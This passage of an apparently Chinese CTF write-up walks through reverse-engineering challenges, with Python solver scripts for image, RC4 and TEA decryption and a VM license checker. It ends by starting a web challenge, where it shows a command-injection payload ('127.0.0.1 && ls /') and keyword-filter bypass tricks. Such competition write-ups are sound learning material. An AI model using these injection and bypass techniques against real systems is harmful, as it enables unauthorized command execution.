from PIL import Image\nimport struct\n\ndef solve():\n    img_path = \"encrypt.png\"\n    out_path = \"0.png\"\n\n    try:\n        img = Image.open(img_path).convert(\"RGBA\")\n        pixels = img.load()\n        w, h = img.size\n    except:\n        return\n\n    key_len = 1003\n    key_buf = [None] * key_len\n    filled_count = 0\n\n    for y in range(h):\n        for x in range(w):\n            r, g, b, a = pixels[x, y]\n            v10 = 4 * (x + y * w)\n            k_idx = (v10 + 3) % key_len\n\n            if key_buf[k_idx] is None:\n                mask = a ^ 0xFF\n                key_val = ((mask + 16) & 0xFF) ^ 0x55\n                key_buf[k_idx] = key_val\n                filled_count += 1\n\n            if filled_count == key_len:\n                break\n        if filled_count == key_len:\n            break\n\n    if filled_count < key_len:\n        print(\"Key incomplete\")\n\n    for y in range(h):\n        for x in range(w):\n            r, g, b, a = pixels[x, y]\n            v10 = 4 * (x + y * w)\n\n            idx_r = v10 % key_len\n            idx_g = (v10 + 1) % key_len\n            idx_b = (v10 + 2) % key_len\n            idx_a = (v10 + 3) % key_len\n\n            k_r = key_buf[idx_r]\n            k_g = key_buf[idx_g]\n            k_b = key_buf[idx_b]\n            k_a = key_buf[idx_a]\n\n            mask_r = ((x * x) + k_r + (k_r ^ 0xAA)) & 0xFF\n            orig_r = r ^ mask_r\n\n            v11 = k_g\n            v12 = k_b\n\n            mask_g = (v12 ^ (x * y) ^ (3 * v11)) & 0xFF\n            orig_g = g ^ mask_g\n\n            v14 = ((y * y) + v11) & 0xFF\n            mask_b = (v14 + ((2 * v12) ^ 0x66)) & 0xFF\n            orig_b = b ^ mask_b\n\n            v18 = ((k_a ^ 0x55) - 16) & 0xFF\n            orig_a = a ^ v18 \n\n            pixels[x, y] = (orig_r, orig_g, orig_b, orig_a)\n\n    img.save(out_path)\n    print(\"Done\")\n\nif __name__ == \"__main__\":\n    solve()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{@lPh4_b1T_L3Ak_th3_kEy_bUt_Ci4ll0!!}<\/code><\/pre>\n\n\n\n
\u9636\u6bb52<\/h2>\n\n\n\n
\u6574\u6570\u9762<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u52a8\u6001\u9898\u76ee,\u4e0b\u8f7d\uff0cIDA\u5206\u6790<\/p>\n\n\n\n
\u770bmain<\/code> \u51fd\u6570\u4e2d\u770b\u4f3c\u6b63\u5e38\u7684\u6821\u9a8c\u6d41\u7a0b\u5b9e\u9645\u4e0a\u662f\u4e2a\u9677\u9631\uff0c\u4e00\u4e2a\u5751666<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
sub_140001EEA \u4e2d\u5982\u679c\u8f93\u5165\u4e3a\u7a7a\uff0c\u4f1a\u8c03\u7528 sub_140001957 \u5229\u7528 rand() \u751f\u6210\u4e00\u4e2a\u5305\u542b \u201cFAKE_FLAG\u201d \u7684\u4f2a\u9020 Flag\u3002<\/code><\/pre>\n\n\n\n
\u5f53\u65f6\u4e0a\u5f53\u4e86<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{7h1s_i5_4__FAKE_FLAG__h0N3y_p0t_sO_5wE3t_h4Ha}<\/code><\/pre>\n\n\n\n
\u5047\u7684<\/p>\n\n\n\n
flag \u540e\u534a\u90e8\u5206 \uff1a<\/p>\n\n\n\n
\u6838\u5fc3\u6df7\u6dc6\u51fd\u6570 sub_14000161F<\/code>\u3002<\/p>\n\n\n\n
\u8be5\u51fd\u6570\u5229\u7528\u9b54\u6570 17 (0x11) \u548c 45 (0x2D) \u751f\u6210\u4e00\u4e2a S-Box\u3002\nflag \u7684\u540e\u534a\u90e8\u5206 Bu7_H@tES_Cod3_pr#tEc7iOn_@nd_craCkiNG} \n\u76f4\u63a5\u9690\u85cf\u5728 S-Box \u53d8\u6362\u540e\u7684\u521d\u59cb\u5316\u6570\u7ec4\u4e2d\u3002\u540c\u65f6\uff0c\u8be5\u6570\u7ec4\u8fd8\u63d0\u4f9b\u4e86\u7d22\u5f15\uff0c\u5c06\u539f\u59cb\u5bc6\u94a5 your-secret-key-here \u4fee\u6539\u4e3a BV1GJ411x7h7key-here\u3002<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag \u524d\u534a\u90e8\u5206\uff1a<\/p>\n\n\n\n
\u771f\u6b63\u7684\u52a0\u5bc6\u6570\u636e\u4f4d\u4e8e\u4e8c\u8fdb\u5236\u6587\u4ef6\u4e2d\u5b57\u7b26\u4e32 denuvo_atd<\/code> \u9644\u8fd1\u3002<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u52a0\u5bc6\u903b\u8f91<\/p>\n\n\n\n
RC4: \u4f7f\u7528\u65b0\u5bc6\u94a5\uff08\u8df3\u8fc7\u7b2c1\u4e2a\u5b57\u8282\uff09\u52a0\u5bc6\u660e\u6587 Part 1\u3002\nInt Transform: \u5947\u5076\u53d8\u6362\uff08main \u51fd\u6570\u540c\u6b3e\u903b\u8f91\uff09\u3002\nCumulative Base64: \u81ea\u5b9a\u4e49\u5b57\u6bcd\u8868\u7684\u7d2f\u79ef\u6c42\u548c Base64 \u7f16\u7801\u3002\nBitwise NOT: \u6309\u4f4d\u53d6\u53cd (~).<\/code><\/pre>\n\n\n\n
\u52a0\u5bc6\u6d41\u7a0b\u9006\u5411\uff1a<\/p>\n\n\n\n
\u63d0\u53d6\u6570\u636e\uff1a\u641c\u7d22 200 \u5b57\u8282\u6570\u636e\u5757\uff0c\u7279\u5f81\u662f\u6309\u4f4d\u53d6\u53cd\u540e\u7b26\u5408 Base64 \u5b57\u7b26\u96c6\u3002\n1\uff1a\u6309\u4f4d\u53d6\u53cd (~x)\u3002\n2\uff1a\u9006\u5411\u7d2f\u79ef Base64 (Reverse Cumulative Sum)\u3002\n3\uff1a\u9006\u5411\u6574\u6570\u53d8\u6362\uff08main \u51fd\u6570\u4e2d\u7684\u5947\u5076\u53d8\u6362\u903b\u8f91\uff09\u3002\n4\uff1aRC4 \u89e3\u5bc6\uff0c\u4f7f\u7528\u4fee\u6539\u540e\u7684\u5bc6\u94a5\uff08\u4ece\u7b2c2\u5b57\u8282\u5f00\u59cb\uff09\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
import sys\nfrom pathlib import Path\n\ndef rc4_decrypt(key, data):\n    s = list(range(256))\n    j = 0\n    for i in range(256):\n        j = (j + s[i] + key[i % len(key)]) & 0xFF\n        s[i], s[j] = s[j], s[i]\n    i = j = 0\n    res = bytearray()\n    for b in data:\n        i = (i + 1) & 0xFF\n        j = (j + s[i]) & 0xFF\n        s[i], s[j] = s[j], s[i]\n        res.append(b ^ s[(s[i] + s[j]) & 0xFF])\n    return bytes(res)\n\ndef gen_sbox():\n    s = list(range(256))\n    d8, d4 = 0x11, 0x2D\n    for _ in range(3):\n        d8 = (d8 * d8) & 0xFFFFFFFF\n        d4 = (d4 * d4) & 0xFFFFFFFF\n        for out in range(0x10):\n            for inn in range(0x10):\n                ac = (inn * d4 + out) & 0xF\n                edx = (out * d8) & 0xFFFFFFFF\n                ecx = (d8 * d4 + 1) & 0xFFFFFFFF\n                eax = (inn * ecx + edx) & 0xFFFFFFFF\n                a8 = eax & 0xF\n                idx1 = (out << 4) + inn\n                idx2 = (ac << 4) + a8\n                s[idx1], s[idx2] = s[idx2], s[idx1]\n    return s\n\ndef rev_cum_base64(data, alpha):\n    idx_map = {c: i for i, c in enumerate(alpha)}\n    prev = 0\n    vals = []\n    for c in data:\n        curr = idx_map[c]\n        vals.append((curr - prev) % 64)\n        prev = curr\n    out = bytearray()\n    for i in range(0, len(vals), 4):\n        if i+4 > len(vals): break\n        v = vals[i:i+4]\n        out.append(((v[0] << 2) | (v[1] >> 4)) & 0xFF)\n        out.append((((v[1] & 0xF) << 4) | (v[2] >> 2)) & 0xFF)\n        out.append((((v[2] & 0x3) << 6) | v[3]) & 0xFF)\n    return bytes(out)\n\ndef rev_int_trans(data, key):\n    out = bytearray()\n    klen = len(key)\n    for i, b in enumerate(data):\n        if (b & 1) == 0:\n            out.append(b >> 1)\n        else:\n            kb = (ord(key[i % klen]) | 1)\n            out.append(0x80 + ((b ^ kb) >> 1))\n    return bytes(out)\n\ndef solve():\n    exe = Path(\"int-mian.exe\").read_bytes()\n    key_pos = exe.find(b\"your-secret-key-here\\x00\")\n    base = key_pos - 0x40\n    print(f\"[*] \u5b9a\u4f4d\u5230\u6570\u636e\u6bb5\u504f\u79fb: {hex(base)}\")\n\n    org_key = exe[base+0x40 : base+0x54]\n    alpha = exe[base+0x60 : base+0xA0]\n    init_arr = exe[base+0x120 : base+0x154]\n\n    print(\"[*] \u751f\u6210 S-Box \u5e76\u63d0\u53d6 Flag \u540e\u534a\u90e8\u5206...\")\n    sbox = gen_sbox()\n    trans_arr = bytearray(init_arr)\n    for i in range(len(trans_arr)):\n        trans_arr[i] = sbox[trans_arr[i]]\n    \n    part2 = trans_arr[:0x28].split(b\"\\x00\")[0].decode()\n    print(f\"[*] \u627e\u5230 Flag \u540e\u534a\u90e8\u5206: {part2}\")\n\n    mod_idxs = trans_arr[0x28:0x34]\n    mod_key = bytearray(org_key)\n    for i in range(12):\n        mod_key[i] = alpha[mod_idxs[i]]\n    mod_key_str = mod_key.decode()\n    print(f\"[*] \u751f\u6210\u65b0\u5bc6\u94a5: {mod_key_str}\")\n\n    print(\"[*] \u641c\u7d22\u52a0\u5bc6\u6570\u636e\u5757...\")\n    denuvo = exe.find(b\"denuvo_atd\\x00\")\n    alpha_set = set(alpha)\n    blob = None\n    \n    for off in range(denuvo, min(len(exe), denuvo + 0x400)):\n        chunk = exe[off:off+200]\n        inv = bytes((~b) & 0xFF for b in chunk)\n        if all(c in alpha_set for c in inv):\n            blob = chunk\n            print(f\"[*] \u9501\u5b9a\u52a0\u5bc6\u6570\u636e\u5757\u504f\u79fb: {hex(off)}\")\n            break\n            \n    encoded = bytes((~b) & 0xFF for b in blob)\n    decoded_b64 = rev_cum_base64(encoded, alpha)\n    pre_rc4 = rev_int_trans(decoded_b64, mod_key_str)\n    decrypted = rc4_decrypt(mod_key[1:], pre_rc4).decode(errors=\"ignore\")\n    \n    part1 = decrypted.split(\"SHCTF{\")[1].split(\" \")[0]\n    print(f\"\\n[+] Flag: SHCTF{{{part1}{part2}}}\")\n\nif __name__ == \"__main__\":\n    solve()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{Iilran_IIK35_complLER_t3ChNOI#gy_aNd_ProGRAm_M3ch4nlSM5_Bu7_H@tES_Cod3_pr#tEc7iOn_@nd_craCkiNG}<\/code><\/pre>\n\n\n\n
LicenseVerifier<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
python\u6253\u5305\u7684<\/p>\n\n\n\n
\u89e3\u5305<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u7528Pycdc and Pycdas2 \u53cd\u7f16\u8bd1\u4e0d\u6210\u529f\u7248\u672c\u4e0d\u540c \u4f5c\u8005\u7528\u7684python3.13<\/p>\n\n\n\n
\u4f7f\u7528\u7f51\u7ad9pychaos | Python 3.13<\/a><\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
import os\nimport sys\nimport ctypes\nimport sys_core\nBASE_DIR = os.path.dirname(__file__)\ndef _load_library(name: str) -> bool:\n  '''Attempts to load a DLL for environment setup.'''\n  path = os.path.join(BASE_DIR,name)\n  if os.path.exists(path):\n    return False\n  else:\n    try:\n      lib = ctypes.WinDLL(path)\n      for init_func in ('init_vm','hook_init','init'):\n        if hasattr(lib,init_func):\n          try:\n            getattr(lib,init_func)()\n            return True\n            return True\n          except Exception:\n            pass\n\n    except Exception:\n      return False\n\ndef _check_decoy() -> None:\n  '''Checks for decoy flags (CTF element).'''\n  path = os.path.join(BASE_DIR,'decoy.dll')\n  if os.path.exists(path):\n    try:\n      lib = ctypes.WinDLL(path)\n      if hasattr(lib,'get_decoy_flag'):\n        f = lib.get_decoy_flag\n        f.restype = ctypes.c_char_p\n        print(f'''Hint: {f().decode(errors='ignore')}''')\n\n    except Exception:\n      pass\n\n  fake_flag_path = os.path.join(BASE_DIR,'fake_flag.txt')\n  if os.path.exists(fake_flag_path):\n    try:\n      with open(fake_flag_path,'r',encoding='utf-8',errors='ignore') as f:\n        print(f'''Hint: {f.read().strip()}''')\n\n    except Exception:\n      return None\n\n    return None\n  else:\n    return None\n\ndef main():\n  '''Main entry point for the License Verifier.'''\n  print('License Verifier v1.0')\n  print('=====================')\n  _check_decoy()\n  if _load_library('hook.dll'):\n    print('[System] Hook library loaded.')\n\n  try:\n    license_key = input('Enter License Key: ').strip()\n  except EOFError:\n    return None\n\n  if sys_core.verify_license(license_key):\n    print('n[Success] License Validated. Access Granted.')\n    return None\n  else:\n    print('n[Error] Invalid License Key.')\n    sys.exit(1)\n    return None\n\nif __name__ == '__main__':\n  main()\n\n\u00a9 2025-2026 Copyright PyChaos<\/code><\/pre>\n\n\n\n
\u4ece main.py<\/code> \u7684\u4ee3\u7801\u4e2d\u53ef\u4ee5\u770b\u5230\u8fd9\u4e00\u884c\u5173\u952e\u5224\u65ad\uff1a<\/p>\n\n\n\n
if sys_core.verify_license(license_key):<\/code><\/pre>\n\n\n\n
\u8fd9\u610f\u5473\u7740\u771f\u6b63\u7684\u9a8c\u8bc1\u903b\u8f91\u5728 sys_core \u6a21\u5757\u4e2d\u3002<\/p>\n\n\n\n
\u9898\u76ee\u63cf\u8ff0\u63d0\u5230\u201c\u865a\u62df\u673a\u6280\u672f\u201d\uff0c\u4e14\u4ee3\u7801\u4e2d\u6709 ctypes.WinDLL<\/code> \u52a0\u8f7d\u5e93\u7684\u64cd\u4f5c\uff0c\u5e76\u5c1d\u8bd5\u8c03\u7528 init_vm<\/code>\u3002<\/p>\n\n\n\n
\u4f7f\u7528 IDA hook.dll\u3002 \u53d1\u73b0\u662f\u5047\u7684<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u53d1\u73b0PYZ.pyz_extracted \u91cc\u9762\u6ca1\u6709\u4e1c\u897f<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u4f7f\u7528\u89e3\u5305\u6709\u95ee\u9898\u4f7f\u7528\u7528\u7f51\u7ad9\u5427 py\u7248\u672c\u4e0d\u540c\u7684\u539f\u56e0PyInstaller Extractor WEB<\/a><\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5206\u6790sys_core.pyc<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u53cd\u7f16\u8bd1<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
import hashlib\nimport struct\nimport os\nfrom typing import List, Optional\nOP_PUSH,OP_XOR,OP_ADD,OP_SUB,OP_LOAD,OP_CHECK,OP_OUT,OP_HALT = range(1,9)\nclass KernelError(Exception):\n  __doc__ = 'Custom exception for Kernel errors.'\n\nclass SystemKernel:\n  __doc__ = '''\nLightweight virtual machine kernel for license verification.\n'''\n  def __init__(self,code: bytes,user_input: str):\n    self.code = code\n    self.ip = 0\n    self.stack = []\n    self.input_buffer = user_input\n    self.is_valid = True\n    self.output = []\n\n  def _fetch_byte(self) -> int:\n    if self.ip >= len(self.code):\n      raise KernelError('Instruction Pointer Out of Bounds')\n\n    val = self.code[self.ip]\n    self.ip += 1\n    return val\n\n  def _fetch_word(self) -> int:\n    return self._fetch_byte()|self._fetch_byte()<<8\n\n  def run(self) -> bool:\n    '''Executes the bytecode.'''\n    while self.ip < len(self.code):\n      op = self._fetch_byte()\n      if op == OP_PUSH:\n        self.stack.append(self._fetch_word())\n      else:\n        if op == OP_XOR:\n          a = self.stack.pop()\n          b = self.stack.pop()\n          self.stack.append(a^b)\n        else:\n          if op == OP_ADD:\n            a = self.stack.pop()\n            b = self.stack.pop()\n            self.stack.append(a+b&65535)\n          else:\n            if op == OP_SUB:\n              a = self.stack.pop()\n              b = self.stack.pop()\n              self.stack.append(a-b&65535)\n            else:\n              if op == OP_LOAD:\n                idx = self._fetch_word()\n                val = ord(self.input_buffer[idx]) if idx < len(self.input_buffer) else 0\n                self.stack.append(val)\n              else:\n                if op == OP_CHECK:\n                  target = self._fetch_word()\n                  val = self.stack.pop()\n                  if val != target:\n                    self.is_valid = False\n\n                else:\n                  if op == OP_OUT:\n                    self.output.append(chr(self.stack.pop()&255))\n                  else:\n                    if op == OP_HALT:\n                      pass\n                      return self.is_valid\n                    else:\n                      raise KernelError(f'''Unknown Opcode: {op:02x}''')\n\n    return self.is_valid\n\nAPI_SECRET = 'SysCore@2025#internal_key'\ndef _derive_key(length: int) -> bytes:\n  return hashlib.sha256(API_SECRET+str(length).encode()).digest()\n\ndef _load_config() -> bytes:\n  '''Loads and decrypts the system configuration (bytecode).'''\n  config_path = os.path.join(os.path.dirname(__file__),'sys.config')\n  if os.path.exists(config_path):\n    raise KernelError('Configuration Missing')\n\n  with open(config_path,'rb') as f:\n    data = f.read()\n\n  if len(data) < 2:\n    raise KernelError('Configuration Corrupted')\n\n  code_len = struct.unpack('<H',data[:2])[0]\n  encrypted_payload = data[2:]\n  key = _derive_key(code_len)\n  layer1 = bytearray((x^i*165^92&255 for i,x in enumerate(encrypted_payload)))\n  decrypted_body = (key,layer1)((layer1[i]^key[i%len(key)] for i in range(len(layer1))))\n  bytecode = decrypted_body[:code_len]\n  checksum = struct.unpack('<I',decrypted_body[code_len:code_len+4])[0]\n  if sum(bytecode)&0xFFFFFFFF != checksum:\n    raise KernelError('Integrity Check Failed')\n\n  return bytecode\n\ndef verify_license(user_input: str) -> bool:\n  '''Public API to verify the license key.'''\n  try:\n    bytecode = _load_config()\n    kernel = SystemKernel(bytecode,user_input)\n    return kernel.run()\n  except Exception:\n    return False\n\n\u00a9 2025-2026 Copyright PyChaos<\/code><\/pre>\n\n\n\n
sys_core.py \u5b9e\u73b0\u4e86\u4e00\u4e2a\u57fa\u4e8e\u6808\u7684\u865a\u62df\u673a\uff08Stack VM\uff09\u3002\n\u5b57\u8282\u7801\u52a0\u8f7d\uff1a\u8bfb\u53d6 sys.config -> SHA256 \u6d3e\u751f\u5bc6\u94a5 -> \u4e24\u5c42 XOR \u89e3\u5bc6 -> \u6821\u9a8c Checksum\u3002\n\u6307\u4ee4\u96c6\uff1a\u5305\u542b PUSH, XOR, ADD, SUB, LOAD (\u8bfb\u53d6\u8f93\u5165), CHECK (\u6821\u9a8c\u503c) \u7b49\u6307\u4ee4\u3002<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u89e3\u9898\u601d\u8def<\/strong>\uff1a<\/p>\n\n\n\n
\u590d\u73b0\u89e3\u5bc6\u7b97\u6cd5\u8fd8\u539f Bytecode\u3002\n\u7f16\u5199\u7b26\u53f7\u6267\u884c\uff08Symbolic Execution\uff09\u811a\u672c\uff0c\u6a21\u62df VM \u5806\u6808\u64cd\u4f5c\u3002\n\u9047\u5230 OP_CHECK \u6307\u4ee4\u65f6\uff0c\u6839\u636e\u6808\u9876\u8868\u8fbe\u5f0f\u53cd\u63a8\u8f93\u5165\u5b57\u7b26\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
import hashlib\nimport struct\nimport os\nimport sys\n\nAPI_SECRET = 'SysCore@2025#internal_key'\n\nclass Node:\n    def __init__(self, type_, value=None, left=None, right=None):\n        self.type = type_\n        self.value = value\n        self.left = left\n        self.right = right\n        self.op = None\n\ndef derive_key(length):\n    raw = API_SECRET + str(length)\n    return hashlib.sha256(raw.encode('utf-8')).digest()\n\ndef get_bytecode():\n    with open('sys.config', 'rb') as f:\n        data = f.read()\n    code_len = struct.unpack('<H', data[:2])[0]\n    enc = data[2:]\n    key = derive_key(code_len)\n    l1 = bytearray()\n    for i, x in enumerate(enc):\n        l1.append((x ^ (i * 165) ^ 92) & 0xFF)\n    body = bytearray()\n    for i in range(len(l1)):\n        body.append(l1[i] ^ key[i % len(key)])\n    return body[:code_len]\n\ndef solve_node(node, target, res):\n    if node.type == 'INPUT':\n        res[node.value] = target\n        return\n\n    def is_c(n):\n        if n.type == 'CONST': return True\n        if n.type == 'INPUT': return False\n        return is_c(n.left) and is_c(n.right)\n\n    def eval_c(n):\n        if n.type == 'CONST': return n.value\n        if n.op == 3: return (eval_c(n.left) + eval_c(n.right)) & 0xFFFF\n        if n.op == 4: return (eval_c(n.left) - eval_c(n.right)) & 0xFFFF\n        if n.op == 2: return eval_c(n.left) ^ eval_c(n.right)\n        return 0\n\n    lc = is_c(node.left)\n    rc = is_c(node.right)\n\n    if lc and not rc:\n        c = eval_c(node.left)\n        if node.op == 3: solve_node(node.right, (target - c) & 0xFFFF, res)\n        elif node.op == 4: solve_node(node.right, (c - target) & 0xFFFF, res)\n        elif node.op == 2: solve_node(node.right, target ^ c, res)\n    elif not lc and rc:\n        c = eval_c(node.right)\n        if node.op == 3: solve_node(node.left, (target - c) & 0xFFFF, res)\n        elif node.op == 4: solve_node(node.left, (target + c) & 0xFFFF, res)\n        elif node.op == 2: solve_node(node.left, target ^ c, res)\n\ndef pwn():\n    code = get_bytecode()\n    ip = 0\n    stack = []\n    chars = {}\n\n    def fb():\n        nonlocal ip\n        v = code[ip]\n        ip += 1\n        return v\n\n    def fw():\n        return fb() | (fb() << 8)\n\n    while ip < len(code):\n        op = fb()\n        if op == 1:\n            stack.append(Node('CONST', value=fw()))\n        elif op == 5:\n            stack.append(Node('INPUT', value=fw()))\n        elif op in (2, 3, 4):\n            a = stack.pop()\n            b = stack.pop()\n            n = Node('OP', left=a, right=b)\n            n.op = op\n            stack.append(n)\n        elif op == 6:\n            target = fw()\n            expr = stack.pop()\n            solve_node(expr, target, chars)\n        elif op == 7:\n            if stack: stack.pop()\n        elif op == 8:\n            break\n\n    mx = max(chars.keys())\n    f = [''] * (mx + 1)\n    for k, v in chars.items():\n        f[k] = chr(v)\n    print(''.join(f))\n\nif __name__ == '__main__':\n    pwn()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{Vm_1s_FuN_&_PyTh0n_1s_PoW3rFuL_But_R3aL_W0r1d_1s_M0r3_C0mp1ic4t3d}<\/code><\/pre>\n\n\n\n
\u9636\u6bb53<\/h2>\n\n\n\n
trace<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u7b80\u5355\u5206\u6790\u5206\u6790<\/p>\n\n\n\n
\u5206\u6790\u7a0b\u5e8f\u6a21\u62df\u4e86\u4e00\u4e2a TEA \u53d8\u4f53 \u52a0\u5bc6\u7b97\u6cd5\u3002\u7a0b\u5e8f\u901a\u8fc7 exec<\/code> \u51fd\u6570\u5c06\u57fa\u7840\u7b97\u672f\u8fd0\u7b97\uff08\u52a0\u6cd5\u3001\u5f02\u6216\u3001\u4f4d\u79fb\u3001\u4e58\u6cd5\uff09\u8fdb\u884c\u4e86\u6df7\u6dc6\u5305\u88c5\u3002<\/p>\n\n\n\n
\u901a\u8fc7\u6307\u4ee4\u8868\u6a21\u62df\u57fa\u7840\u8fd0\u7b97\uff080:\u52a0\u6cd5, 1:\u5f02\u6216, 2:\u5de6\u79fb, 3:\u53f3\u79fb, 4:\u4e58\u6cd5\uff09\u3002<\/p>\n\n\n\n
\u4ee3\u7801\u592a\u5927\u4e86\u5c31\u4e0d\u5448\u73b0\u4e86<\/p>\n\n\n\n
\u5bc6\u94a5\u751f\u6210\uff1a<\/p>\n\n\n\n
k0 = (0x12345678 & 0xFFFF) * 0x1337 = 0x67399D08\nk1 = 0xDEADBEEF + 0xAAAA = 0xDEAE6999\nk2 = k0 ^ k1 = 0xB997F491\nk3 = (k2 << 1) + 1 = 0x732FE923<\/code><\/pre>\n\n\n\n
\u52a0\u5bc6\u7279\u5f81\uff1a<\/p>\n\n\n\n
\u5355\u8f6e\u5e38\u6570 delta = 0x9E3779B9\u3002\n\u6807\u51c6 TEA \u7ed3\u6784\uff0c\u4f46\u4f4d\u79fb\u4f4d\u6570\u548c\u5bc6\u94a5\u7d22\u5f15\u6709\u6240\u53d8\u5316\u3002\nv0 \u66f4\u65b0\u516c\u5f0f\uff1av0 += ((v1 << 2) + k3) ^ (v1 + sum) ^ ((v1 >> 4) + k1)\nv1 \u66f4\u65b0\u516c\u5f0f\uff1av1 += ((v0 << 2) + k2) ^ (v0 + sum) ^ ((v0 >> 4) + k0)\n\u603b\u8ba1\u8fed\u4ee3 32 \u8f6e\u3002<\/code><\/pre>\n\n\n\n
\u52a0\u5bc6:\u5c06\u8f93\u5165 flag \u6309 8 \u5b57\u8282\uff08\u4e24\u4e2a uint32\uff09\u5206\u7ec4\u3002<\/p>\n\n\n\n
\u521d\u59cb sum = 0\u3002\n\u5faa\u73af 32 \u6b21\uff1a\nsum += delta\nv0 += [(v1 << 2) + k3] ^ [v1 + sum] ^ [(v1 >> 4) + k1]\nv1 += [(v0 << 2) + k2] ^ [v0 + sum] ^ [(v0 >> 4) + k0]<\/code><\/pre>\n\n\n\n
\u89e3\u5bc6\u5faa\u73af 32 \u6b21\uff08\u9006\u5411\uff09\u5c31\u884c\u4e86<\/p>\n\n\n\n
\u521d\u59cb sum = delta * 32<\/code><\/p>\n\n\n\n
v1 -= [(v0 << 2) + k2] ^ [v0 + sum] ^ [(v0 >> 4) + k0]\nv0 -= [(v1 << 2) + k3] ^ [v1 + sum] ^ [(v1 >> 4) + k1]\nsum -= delta<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
import struct\n\ndef decrypt(v0, v1, k):\n    delta = 0x9E3779B9\n    sum_val = (delta * 32) & 0xFFFFFFFF\n    for _ in range(32):\n        v1 = (v1 - (((v0 << 2) + k[2]) ^ (v0 + sum_val) ^ ((v0 >> 4) + k[0]))) & 0xFFFFFFFF\n        v0 = (v0 - (((v1 << 2) + k[3]) ^ (v1 + sum_val) ^ ((v1 >> 4) + k[1]))) & 0xFFFFFFFF\n        sum_val = (sum_val - delta) & 0xFFFFFFFF\n    return v0, v1\n\nk0 = (0x5678 * 0x1337) & 0xFFFFFFFF\nk1 = (0xDEADBEEF + 0xAAAA) & 0xFFFFFFFF\nk2 = (k0 ^ k1) & 0xFFFFFFFF\nk3 = (k2 * 2 + 1) & 0xFFFFFFFF\nkey = [k0, k1, k2, k3]\n\ntarget = [\n    0x4a, 0xd4, 0x4f, 0x82, 0x37, 0xe8, 0x6d, 0xf9, \n    0x55, 0x6e, 0xc5, 0x22, 0x36, 0xb1, 0x38, 0x5b, \n    0xc1, 0x8f, 0x27, 0x6a, 0xff, 0x65, 0x85, 0x42, \n    0x24, 0xbf, 0x63, 0xde, 0x33, 0xb8, 0x4d, 0x8e, \n    0xbc, 0xae, 0xb3, 0x5b, 0x7e, 0x9c, 0x76, 0x11\n]\n\nblocks = []\nfor i in range(0, len(target), 4):\n    blocks.append(struct.unpack(\"<I\", bytes(target[i:i+4]))[0])\n\nflag = b\"\"\nfor i in range(0, len(blocks), 2):\n    v0, v1 = decrypt(blocks[i], blocks[i+1], key)\n    flag += struct.pack(\"<II\", v0, v1)\n\nprint(flag.decode().strip('x00'))<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{all_you_need_is_deobfuscation}<\/code><\/pre>\n\n\n\n
Web(\u5168\u89e3)<\/h1>\n\n\n\n
\u9636\u6bb51<\/strong><\/h2>\n\n\n\n
ez-ping<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6f0f\u6d1e\u6210\u56e0\uff1a<\/strong> \u540e\u7aef\u672a\u8fc7\u6ee4 ping<\/code> \u547d\u4ee4\u7684\u8f93\u5165\u53c2\u6570\uff0c\u5b58\u5728\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\u3002<\/p>\n\n\n\n
\u9996\u5148\u786e\u8ba4\u76ee\u5f55\u6587\u4ef6\u7ed3\u6784\u3002<\/p>\n\n\n\n
Payload:<\/strong><\/p>\n\n\n\n
127.0.0.1 && ls \/<\/code><\/pre>\n\n\n\n
\u53d1\u73b0\u6839\u76ee\u5f55\u4e0b\u5b58\u5728 flag<\/code> \u6587\u4ef6\u3002<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u8bfb\u53d6\u5c31\u884c<\/p>\n\n\n\n
\u7ed5\u8fc7\u6280\u5de7\u5206\u6790\n\u547d\u4ee4\u8fde\u63a5 (&&): \u5229\u7528\u903b\u8f91\u4e0e\uff0c\u5728 IP Ping \u901a\u540e\u6267\u884c\u540e\u7eed\u547d\u4ee4\u3002\n\u547d\u4ee4\u66ff\u6362 (nl): cat \u88ab\u7981\uff0c\u4f7f\u7528 nl (\u6dfb\u52a0\u884c\u53f7\u6253\u5370) \u4f5c\u4e3a\u66ff\u4ee3\u547d\u4ee4\u8bfb\u53d6\u6587\u4ef6\u3002\n\u901a\u914d\u7b26 (?): flag \u5173\u952e\u5b57\u88ab\u7981\uff0c\u4f7f\u7528 \/fl?g \u5339\u914d\u6587\u4ef6\u540d\uff0c\u6210\u529f\u7ed5\u8fc7\u6b63\u5219\u68c0\u6d4b\u3002<\/code><\/pre>\n\n\n\n
\u5c1d\u8bd5\u8bfb\u53d6\u6587\u4ef6\u65f6\u53d1\u73b0 cat<\/code> \u548c flag<\/code> \u5173\u952e\u5b57\u88ab\u8fc7\u6ee4\uff0c\u6784\u5efa\u7ed5\u8fc7 Payload\u3002<\/p>\n\n\n\n
\u6700\u7ec8 Payload:<\/strong><\/p>\n\n\n\n
